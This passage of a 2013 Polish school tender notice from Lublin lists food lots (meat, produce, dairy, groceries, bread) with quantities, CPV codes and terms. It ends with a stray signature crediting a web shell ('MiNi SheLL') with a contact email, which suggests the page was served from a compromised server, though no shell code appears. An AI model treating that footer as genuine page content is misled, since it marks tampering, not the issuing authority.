<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Podane w opisie przedmiotu zamówienia ilości mogą zostać zmniejszone lub zwiększone o określoną wartość procentową tj. : + - 5%.
Zmiana cen jednostkowych brutto dostarczanych produktów oparta będzie na klauzuli waloryzacji cen, o ile Wykonawca w sposób obiektywny ekonomicznie na podstawie wniosku oraz przedłożonych dokumentów uzasadni potrzebę ich zmian.
Zmiana cen jednostkowych brutto dotyczyła będzie także sezonowości tj.spadku lub wzrostu cen związanej z cyklem wytwarzania produktów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp28.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 28, 20-530 Lublin, ul. Radości 13, pok. nr 200.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2013 godzina 11:00, miejsce: Szkoła Podstawowa nr 28, 20-530 Lublin, ul. Radości 13, pok. nr 200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Szponder	kg	70
2.	Wołowina ekstra	kg	70
3.	Wołowina kl. II 	kg	250
4.	Mięso mielone wieprzowo - wołowe	kg	100
5.	Żeberka wieprzowe paski	kg	120
6.	Karczek wieprzowy b/k	kg	550
7.	Łopatka wieprzowa b/k	kg	650
8.	Schab wieprzowy b/k	kg	350
9.	Wątroba wieprzowa	kg	70
10.	Kiełbasa biała	kg	150
11.	Bok wędzony	kg	260
12.	Parówki cielęce ekstra	kg	35
13.	Kiełbasa Podwawelska	kg	220
14.	Szynka wieprzowa gotowana	kg	30
15.	Mielonka Szynka Tyrolska 	kg	45
16.	Polędwica sopocka	kg	15
17.	Polędwica drobiowa	kg	20
18.	Filety z kurczaka pojedyncze	kg	150
19.	Filety z indyka	kg	330
20.	Udziec z kurczaka	kg	1250
21.	Korpusy drobiowe	kg	230
22.	Mięso drobiowe Ekstra kurczak	kg	350
23.	Smalec	kg	110
24.	Słonina	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby mrożone, filety rybne i pozostałe mięso z ryb, warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Filety rybne mrożone miruna bez glazury	kg	550
2.	Konserwa rybna śledź w oleju	szt.	25
3.	Filet pstrąga świeży	kg	70
4.	Konserwa rybna makrela w oleju	szt.	25
5.	Fasola szparagowa żółta mrożona cięta	kg	30
6.	Fasola szparagowa zielona mrożona cięta	kg	250
7.	Mieszanka kompotowa mrożona	kg	90
8.	Kalafior mrożony polski	kg	50
9.	Truskawka mrożona	kg	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ziemniaki, warzywa, owoce świeże i przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Ziemniaki jadalne polskie workowane a30kg	kg	25 000
2.	Kapusta kwaszona	kg	1100
3.	Ogórek kiszony	kg	280
4.	Burak czerwony długi	kg	650
5.	Cebula czerwona	kg	30
6.	Cebula biała polska	kg	1350
6.	Czosnek główka polski	szt.	430
7.	Marchew korzeń polska	kg	2150
8.	Ogórek świeży	kg	360
9.	Pietruszka korzeń polska	kg	900
10.	Rzodkiewka pęczek min. 200g	pęczek	100
11.	Rzepa biała	kg	85
12.	Seler bulwa	kg	300
13.	Fasola Jaś duży	kg	250
14.	Fasola Jaś drobny	kg	50
15.	Groch łupany	kg	50
16.	Papryka świeża	kg	130
17.	Pomidor świeży	kg	230
18.	Brokuły	szt.	400
19.	Botwinka min. 350g	pęczek	60
20.	Kapusta pekińska	kg	280
21.	Kapusta czerwona	kg	150
22.	Kalafior świeży  	szt.	160
23.	Kapusta biała 	kg	400
24.	Kapusta młoda polska	szt.	300
25.	Koper pęczek min. 100g	pęczek	220
26.	Natka pietruszki pęczek min. 100g	pęczek	600
27.	Por	kg	140
28.	Szczaw	kg	30
29.	Szczypior pęczek min. 150g	pęczek	500
30.	Sałata masłowa główka min. 450g	szt.	670
31.	Pieczarka świeża	kg	200
32.	Fasola szparagowa żółta świeża	kg	40
33.	Fasola szparagowa zielona świeża	kg	100
34.	Banany	kg	800
35.	Gruszki polskie	kg	1000
36.	Jabłka polskie	kg	3000
37.	Maliny polskie	kg	100
38.	Mandarynki	kg	100
39.	Morele	kg	14
40.	Nektarynki	kg	20
41.	Pomarańcze	kg	600
42.	Śliwka węgierka	kg	30
43.	Truskawka świeża	kg	120
44.	Brzoskwinie	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mleko, śmietana, nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Mleko 2 %  butelka plastikowa	szt.	2250
2.	Śmietana 12% opakowanie 400g	szt.	490
3.	Serek topiony śmietanowy min. 100g	szt.	40
4.	Śmietana 30% opakowanie 400 g	szt.	160
5.	Masło kostka 200g	szt.	800
6.	Ser twarogowy półtłusty	kg	200
7.	Ser żółty twardy	kg	60
8.	Serek homogenizowany waniliowy 150 g	szt.	400
9.	Jogurt naturalny opak. 400 ml	szt.	20
10.	Jogurt owocowy opak  150 ml	szt.	4500
11.	Jogurt owocowy pitny min. 250 g butelka	szt.	4500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyroby mączne, garmażeryjne do gotowania i smażenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Kopytka świeże	kg	600
2.	Kluski śląskie świeże	kg	400
3.	Pierogi wiejskie świeże	kg	800
4.	Pierogi z kapustą i pieczarkami	kg	180
5.	Pierogi z mięsem	kg	200
6.	Pierogi ruskie	kg	800
7.	Naleśniki	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Cukier a1kg	szt.	1300
2.	Cukier waniliowy 32g	szt.	80
3.	Miód naturalny słoik 300g polski	szt.	30
4.	Kakao rozpuszczalne 300g Puchatek	szt.	30
5.	Czekolada 200g	szt.	1300
6.	Cukierki czekoladowe Mieszanka Solidarność	kg	40
7.	Draże orzechowe 100g	szt.	450
8.	Herbata granulowana Lipton 100g	szt.	40
9.	Ocet spirytusowy 10% a0,5l	szt.	5
10.	Sos sałatkowo-koperkowy proszek a0,8 	szt.	10
11.	Sos grecki proszek a0,8 	szt.	10
12.	Sos pieczeniowy proszek a0,8 	szt.	15
13.	Sos boloński proszek a0,8 	szt.	10
14.	Sos grzybowy proszek a0,8 	szt.	5
15.	Majonez a3kg	szt.	15
16.	Przyprawa Apetita 0,2kg	szt.	600
17.	Papryka słodka 800g	szt.	10
18.	Papryka ostra 800g	szt.	8
19.	Pieprz ziołowy 700g	szt.	10
20.	Przyprawa do zup Maggi 960g	szt.	180
21.	Sól kuchenna a1kg	szt.	300
22.	Ziele angielskie 600g	szt.	10
23.	Zioła prowansalskie 300g	szt.	3
24.	Pieprz naturalny 800g	szt.	30
25.	Majeranek tarty 150g	szt.	20
26.	Liść laurowy 100g	szt.	50
27.	Kminek 550g	szt.	4
28.	Kwasek cytrynowy a1,3kg	szt.	20
29.	Vegeta 200g	szt.	600
30.	Barszcz czerwony koncentrat a1,4kg	szt.	20
31.	Rosół z kury w proszku 0,9kg	szt.	40
32.	Rosół wołowy w proszku 0,9kg	szt.	20
33.	Zupa brokułowa w proszku a1,3kg	szt.	10
34.	Zupa żur w proszku a1,3	szt.	15
35.	Zupa gulaszowa a1,3kg	szt.	10
36.	Marynata do drobiu 700g	szt.	30
37.	Marynata do wieprzowiny 700g	szt.	15
38.	Groszek konserwowy 400g polski	szt.	100
39.	Kukurydza konserwowa 340g polska	szt.	140
40.	Koncentrat pomidorowy 30% 300g Pudliszki	szt.	240
41.	Koncentrat pomidorowy 30% 1000g słoik Pudliszki	szt.	60
42.	Keczup 500g Pudliszki	szt.	5
43.	Chrzan słoik 370ml Rebok	szt.	30
44.	Dżem truskawkowy 280g	szt.	40
45.	Dżem brzoskwiniowy 280g	szt.	40
46.	Galaretka owocowa w proszku 1,3kg Winiary	szt.	30
47.	Pasta orzechowa do smarowania Nutella 400g	szt.	30
48.	Olej rzepakowy 0,9l	szt.	700
49.	Olej słonecznikowy 0,9l	szt.	300
50.	Brzoskwinie w syropie 450g	szt.	100
51.	Ananas w syropie 450g	szt.	60
52.	Napój owocowy w proszku 1kg	szt.	50
53.	Syropy owocowe bez konserwantów 430ml	szt.	600
54.	Soki owocowe w kartonie 200ml	szt.	1500
55.	Soki warzywno-owocowe karton 200ml 	szt.	900
56.	Ryż długoziarnisty biały a1kg	kg	100
57.	Ryż paraboliczny a5kg	kg	200
58.	Mąka pszenna tortowa a1kg	kg	600
59.	Mąka ziemniaczana a1kg	kg	30
60.	Jaja wielkość L	szt.	7000
61.	Płatki kukurydziane opak 0,50 kg	szt.	20
62.	Płatki owsiane opak 400g	szt.	15
63.	Płatki kulki czekoladowe opak. 0,5 kg	szt.	20
64.	Kasza manna a400g	szt.	6
65.	Kasza jęczmienna wiejska a1kg	kg	180
66.	Kasza gryczana a1 kg	kg	60
67.	Kawa zbożowa INKA opak 150g	szt.	10
68.	Makaron nitka cięta As babuni	kg	120
69.	Makaron świderek	kg	600
70.	Makaron kolanko z falbanką	kg	300
71.	Makaron łazanki	kg	150
72.	Wafelki w czekoladzie 50g	szt.	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.31.00.00-4, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo świeże, wyroby piekarskie i cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Chleb krojony pakowany waga co najmniej 550g	szt.	4000
2.	Rogal maślany	szt.	440
3.	Bułka Kajzerka	szt.	2600
4.	Parówka krojona pakowana waga co najmniej 500g	szt.	370
5.	Bułka tarta 	kg	400
6.	Drożdżówka z dżemem	szt.	440
7.	Gniazdko 	szt.	440
8.	Pączek 90g	szt.	1300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com